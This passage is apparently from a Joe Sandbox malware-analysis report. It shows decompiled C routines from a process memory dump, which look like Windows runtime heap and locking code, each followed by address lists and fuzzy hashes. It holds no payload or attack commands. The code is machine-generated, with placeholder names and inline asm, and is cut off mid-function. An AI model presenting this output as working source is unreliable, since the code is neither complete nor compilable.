				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x5697b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E055EF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E055C7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E055E9AE0();
					_t24 = L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                        0x05627799
                                                                        0x0562779a
                                                                        0x0562779b
                                                                        0x056277a3
                                                                        0x056277ab
                                                                        0x056277ae
                                                                        0x056277b1
                                                                        0x056277b1
                                                                        0x056277bf
                                                                        0x056277c4
                                                                        0x056277c8
                                                                        0x056277ce
                                                                        0x056277d4
                                                                        0x056277e0
                                                                        0x056277e0
                                                                        0x056277d6
                                                                        0x056277d6
                                                                        0x056277de
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056277de
                                                                        0x056277e5
                                                                        0x056277f0
                                                                        0x056277f3
                                                                        0x056277f6
                                                                        0x056277fd
                                                                        0x05627800
                                                                        0x0562780c
                                                                        0x05627818
                                                                        0x0562782b
                                                                        0x0562781a
                                                                        0x05627823
                                                                        0x05627823
                                                                        0x05627830
                                                                        0x05627831
                                                                        0x05627838
                                                                        0x0562783d
                                                                        0x0562783e
                                                                        0x0562784f
                                                                        0x0562784f
                                                                        0x0562785a

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e219bba81a1372d23307b49f12340cd5a4be192e0367771311c43ad087e955a
                                                                        • Instruction ID: 9a409f3880e547fe7aef2ca913718da2a80b01f1279115cfed257edbe8c640f2
                                                                        • Opcode Fuzzy Hash: 2e219bba81a1372d23307b49f12340cd5a4be192e0367771311c43ad087e955a
                                                                        • Instruction Fuzzy Hash: 5221A172A00A14AFC725DFA9D894EABBBB9FF88340F10056DF50AD7B50D634E900CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CAE73 Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E055CAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E055C7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E055C7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E055C7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E055C7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E05627794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                        0x055cae78
                                                                        0x055cae7c
                                                                        0x055cae7e
                                                                        0x055cae81
                                                                        0x055cae86
                                                                        0x055cae8d
                                                                        0x05612691
                                                                        0x055cae93
                                                                        0x055cae93
                                                                        0x055cae93
                                                                        0x055cae98
                                                                        0x055cae9d
                                                                        0x056126a2
                                                                        0x056126b4
                                                                        0x056126a4
                                                                        0x056126ad
                                                                        0x056126ad
                                                                        0x056126b9
                                                                        0x00000000
                                                                        0x056126bb
                                                                        0x00000000
                                                                        0x056126bb
                                                                        0x055caea3
                                                                        0x055caea3
                                                                        0x055caea3
                                                                        0x055caeaa
                                                                        0x056126c0
                                                                        0x056126c9
                                                                        0x056126c9
                                                                        0x055caeb3
                                                                        0x056126d4
                                                                        0x056126e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056126e7
                                                                        0x056126ee
                                                                        0x056126f0
                                                                        0x056126f9
                                                                        0x056126f9
                                                                        0x05612702
                                                                        0x05612708
                                                                        0x05612708
                                                                        0x0561270b
                                                                        0x0561270f
                                                                        0x05612711
                                                                        0x05612711
                                                                        0x05612725
                                                                        0x05612725
                                                                        0x00000000
                                                                        0x055caeb9
                                                                        0x055caeb9
                                                                        0x055caebf
                                                                        0x055caebf
                                                                        0x055caeb3

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                        • Instruction ID: 786e1101355d384f19b13976cacb3c811530e423599d309c97e4aebfcbc4bc4e
                                                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                        • Instruction Fuzzy Hash: DE21CF756056858FDB11DBAAC958B353BEAFB45340F0900E8EC058BB92E774DC80CAD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DFD9B Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E055DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E055B76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                        0x055dfd9b
                                                                        0x055dfda0
                                                                        0x055dfda1
                                                                        0x055dfdab
                                                                        0x055dfdad
                                                                        0x055dfdb0
                                                                        0x055dfdb8
                                                                        0x055dfe0f
                                                                        0x055dfde6
                                                                        0x055dfde9
                                                                        0x055dfdec
                                                                        0x0561c0c0
                                                                        0x055dfdfe
                                                                        0x055dfe06
                                                                        0x055dfe06
                                                                        0x0561c0c8
                                                                        0x055dfe2d
                                                                        0x055dfe2d
                                                                        0x00000000
                                                                        0x055dfe2d
                                                                        0x0561c0d1
                                                                        0x0561c0e0
                                                                        0x0561c0e5
                                                                        0x0561c0e5
                                                                        0x0561c0e8
                                                                        0x00000000
                                                                        0x0561c0e8
                                                                        0x055dfdf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055dfdf6
                                                                        0x055dfdfa
                                                                        0x055dfe1a
                                                                        0x055dfe1f
                                                                        0x055dfe1f
                                                                        0x055dfdfc
                                                                        0x00000000
                                                                        0x055dfdfc
                                                                        0x055dfdcc
                                                                        0x055dfdd0
                                                                        0x055dfe26
                                                                        0x00000000
                                                                        0x055dfe26
                                                                        0x055dfdd8
                                                                        0x055dfddb
                                                                        0x055dfddd
                                                                        0x055dfde0
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                        • Instruction ID: 38859f5c4ac0383647a274759dc9eaa1269166dd626248d0ce6d11480932bf51
                                                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                        • Instruction Fuzzy Hash: DD215772644A81EFD731DF4EC544E66F7E6FF94A10F24856EE94A8BA10D731AD00CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DB390 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E055DB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E055C2280(_t12, 0x5698608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E055E00C2(0x5698608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                        0x055db395
                                                                        0x055db3a2
                                                                        0x055db3a5
                                                                        0x055db3aa
                                                                        0x055db3b2
                                                                        0x055db3ba
                                                                        0x055db3bd
                                                                        0x055db3c0
                                                                        0x055db3c4
                                                                        0x055db3c9
                                                                        0x0561a3e9
                                                                        0x0561a3ed
                                                                        0x0561a3f0
                                                                        0x0561a3ff
                                                                        0x0561a403
                                                                        0x0561a409
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561a40b
                                                                        0x0561a40b
                                                                        0x0561a40f
                                                                        0x0561a415
                                                                        0x0561a423
                                                                        0x0561a423
                                                                        0x0561a415
                                                                        0x055db3d1
                                                                        0x055db3e8
                                                                        0x055db3e8
                                                                        0x055db3d9

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b1bcac6bf268ebdb4c892b2f6fdf5acab1d26d7e349fac5b59f10876716c4403
                                                                        • Instruction ID: f73a4e2724fb4988dc5e715263b701472cb860aeb4114b805d12438ef7ec1221
                                                                        • Opcode Fuzzy Hash: b1bcac6bf268ebdb4c892b2f6fdf5acab1d26d7e349fac5b59f10876716c4403
                                                                        • Instruction Fuzzy Hash: D11125377061109BCB29CE598D81A7BB2ABFBC5330B29012DDD16CB780DD31AC02CAD4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A9240 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E055A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x567f708);
				E055FD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E055E95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E055E95D0();
				_t33 =  *0x56984c4; // 0x0
				L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x56984c4; // 0x0
				L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x56984c4; // 0x0
				E055C2280(L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x56986b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E055E95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E055E95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E055A9325();
					_t50 =  *0x56984c4; // 0x0
					return E055FD0D1(L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                        0x055a9240
                                                                        0x055a9242
                                                                        0x055a9247
                                                                        0x055a924c
                                                                        0x055a924e
                                                                        0x055a9255
                                                                        0x055a9257
                                                                        0x055a925a
                                                                        0x055a925f
                                                                        0x055a925f
                                                                        0x055a9266
                                                                        0x055a9271
                                                                        0x055a9276
                                                                        0x055a9279
                                                                        0x055a927e
                                                                        0x055a9295
                                                                        0x055a929a
                                                                        0x055a92b1
                                                                        0x055a92b6
                                                                        0x055a92d7
                                                                        0x055a92dc
                                                                        0x055a92e0
                                                                        0x055a92e6
                                                                        0x055a92e8
                                                                        0x055a92ee
                                                                        0x055a9332
                                                                        0x055a9333
                                                                        0x055a9337
                                                                        0x055a9338
                                                                        0x055a933a
                                                                        0x055a933a
                                                                        0x055a933d
                                                                        0x055a9342
                                                                        0x055a9342
                                                                        0x055a9345
                                                                        0x055a9349
                                                                        0x055a934e
                                                                        0x055a9352
                                                                        0x055a9357
                                                                        0x055a92f4
                                                                        0x055a92f4
                                                                        0x055a92f6
                                                                        0x055a92f9
                                                                        0x055a9300
                                                                        0x055a9306
                                                                        0x055a9324
                                                                        0x055a9324

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1dfa2e15867a2ba0f532b22210a3a57ee3d53f142ab48d75e0e0cb032e09b803
                                                                        • Instruction ID: fde07dd0500ffc4ab6c2a79dd6b465109d6c12412d12cc30ec8eccce31cf64bb
                                                                        • Opcode Fuzzy Hash: 1dfa2e15867a2ba0f532b22210a3a57ee3d53f142ab48d75e0e0cb032e09b803
                                                                        • Instruction Fuzzy Hash: C9216D72251601DFC721EF68CA08F5ABBF9FF48B04F0445ADE14987AA2DB34E941CB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05634257 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E05634257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x56808d0);
				E055FD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E056341E8(__ebx, __edi, __ecx, _t39);
				E055BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x56987e4;
					_t18 =  *0x56987e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x5695cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x56987e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x56987e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L055A7055(_t31 + 0xfffffff8);
								_t24 =  *0x56987e0; // 0x0
								_t18 = _t24 - 1;
								 *0x56987e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x5695cd0;
				if( *0x5695cd0 <= 0) {
					L055A7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x56987e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x56987e8 = _t30;
						 *0x56987e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E055FD0D1(L05634320());
			}















                                                                        0x05634257
                                                                        0x05634257
                                                                        0x05634257
                                                                        0x05634259
                                                                        0x0563425e
                                                                        0x05634263
                                                                        0x05634265
                                                                        0x05634273
                                                                        0x05634278
                                                                        0x0563427c
                                                                        0x0563427f
                                                                        0x05634281
                                                                        0x05634287
                                                                        0x056342d7
                                                                        0x056342d7
                                                                        0x056342da
                                                                        0x0563428d
                                                                        0x0563428d
                                                                        0x0563428f
                                                                        0x05634292
                                                                        0x05634297
                                                                        0x0563429c
                                                                        0x056342a0
                                                                        0x056342a6
                                                                        0x056342a8
                                                                        0x056342ae
                                                                        0x056342b3
                                                                        0x00000000
                                                                        0x056342ba
                                                                        0x056342ba
                                                                        0x056342bf
                                                                        0x056342c5
                                                                        0x056342ca
                                                                        0x056342cf
                                                                        0x056342d0
                                                                        0x00000000
                                                                        0x056342d0
                                                                        0x056342b3
                                                                        0x00000000
                                                                        0x056342a6
                                                                        0x0563429c
                                                                        0x056342dc
                                                                        0x056342dc
                                                                        0x056342e3
                                                                        0x05634309
                                                                        0x056342e5
                                                                        0x056342e5
                                                                        0x056342e8
                                                                        0x056342ee
                                                                        0x056342f0
                                                                        0x00000000
                                                                        0x056342f2
                                                                        0x056342f2
                                                                        0x056342f4
                                                                        0x056342f7
                                                                        0x056342f9
                                                                        0x05634300
                                                                        0x05634300
                                                                        0x056342f0
                                                                        0x0563430e
                                                                        0x0563431f

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38d6c33e9302492c24579cc294c3c42bed3d89fec8327272fe2ad12a78eb6f37
                                                                        • Instruction ID: 2798d57614e3f6c31a0dd5e7555cce2f356f75f660fc9d633f1b898613bf2823
                                                                        • Opcode Fuzzy Hash: 38d6c33e9302492c24579cc294c3c42bed3d89fec8327272fe2ad12a78eb6f37
                                                                        • Instruction Fuzzy Hash: 39216D74611A05CFCB25DF24D00AAA8BBF5FF86316B50926ED119EF761DF319481CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056246A7 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E056246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E055EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E055DD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L055C77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                        0x056246b7
                                                                        0x056246ba
                                                                        0x056246c5
                                                                        0x056246c8
                                                                        0x056246d0
                                                                        0x056246d4
                                                                        0x056246e6
                                                                        0x056246e9
                                                                        0x056246f4
                                                                        0x056246ff
                                                                        0x05624705
                                                                        0x05624706
                                                                        0x0562470c
                                                                        0x05624713
                                                                        0x0562471b
                                                                        0x05624723
                                                                        0x05624725
                                                                        0x056246d6
                                                                        0x056246d9
                                                                        0x056246db
                                                                        0x056246db
                                                                        0x05624732

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                        • Instruction ID: 3b680ec79db505b01b7f8e672ccda1f360fec62453271c88e1d99b1c2b434ec0
                                                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                        • Instruction Fuzzy Hash: 3211A372604608BBCB159F5C98808BEBBB9FF95300F1080ADF94487350DA318D55D7A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D2397 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E055D2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x569848c != 0) {
					L055CFAD0(0x5698610);
					if( *0x569848c == 0) {
						E055CFA00(0x5698610, _t19, _t27, 0x5698610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E055D2581(0x5698610, 0x55850a0, _t26, _t27, _t28);
						E055CFA00(0x5698610, 0x55850a0, _t27, 0x5698610);
					}
				} else {
					L1:
					_t11 =  *0x5698614; // 0x0
					if(_t11 == 0) {
						_t11 = E055E4886(0x5581088, 1, 0x5698614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E055D2581(0x5698610, (_t11 << 4) + 0x5585070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                        0x055d23b0
                                                                        0x055d23b6
                                                                        0x055d2409
                                                                        0x055d2415
                                                                        0x05615ae9
                                                                        0x00000000
                                                                        0x055d241b
                                                                        0x055d241b
                                                                        0x055d241d
                                                                        0x055d2427
                                                                        0x055d242e
                                                                        0x055d2430
                                                                        0x055d2430
                                                                        0x055d23b8
                                                                        0x055d23b8
                                                                        0x055d23b8
                                                                        0x055d23bf
                                                                        0x055d23fc
                                                                        0x055d23fc
                                                                        0x055d23c1
                                                                        0x055d23c3
                                                                        0x055d23d0
                                                                        0x055d23d8
                                                                        0x055d23d8
                                                                        0x055d23dc
                                                                        0x055d23de
                                                                        0x055d23e1
                                                                        0x055d23e1
                                                                        0x055d23ec

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b80a7125647b1b948abb8397d5ff35ad27dc6185c05e06f38aff2c211fb8393b
                                                                        • Instruction ID: 3bf34b4965c3e4a4a4cc5d1ac6696ad7f8e18ccb9ada032f91f271414331882b
                                                                        • Opcode Fuzzy Hash: b80a7125647b1b948abb8397d5ff35ad27dc6185c05e06f38aff2c211fb8393b
                                                                        • Instruction Fuzzy Hash: AC110873744341ABD730AA2E9C84F25F7DEBFD0750F54455AF902AB640D970E841C7A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E37F5 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E055E37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E055C2280(_t6, 0x5698550);
				}
